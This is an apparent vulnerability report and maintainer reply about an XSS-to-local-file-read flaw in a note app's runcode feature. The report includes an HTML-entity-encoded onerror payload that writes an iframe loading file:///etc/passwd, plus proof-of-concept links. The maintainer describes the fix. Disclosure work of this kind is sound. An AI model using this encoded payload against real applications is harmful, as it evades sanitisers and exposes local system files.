XSS to LFI in Runcode Feature

[rezaduty]

By default runcode santized document prefix but if html encode to &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041
then we can inserted html encoded func to html tag event like onerror
<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC:
https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing
https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

[alagrede]

Hi @rezaduty,
Thank you for reporting 🙏!
I just released a new version fixing this. I now block "banned keywords" like document even if the text is HTML encoded.
The real problem was that when a Babel compilation happened, I wasn't escaping the response properly.
It is now fixed!

That being said, like all applications allowing you to execute code locally, if you try to launch malicious or malicious code, it is always possible... Rereading code imported from nowhere before executing it remains important, this is why the code blocks are NEVER executed when the note is opened.

Anthony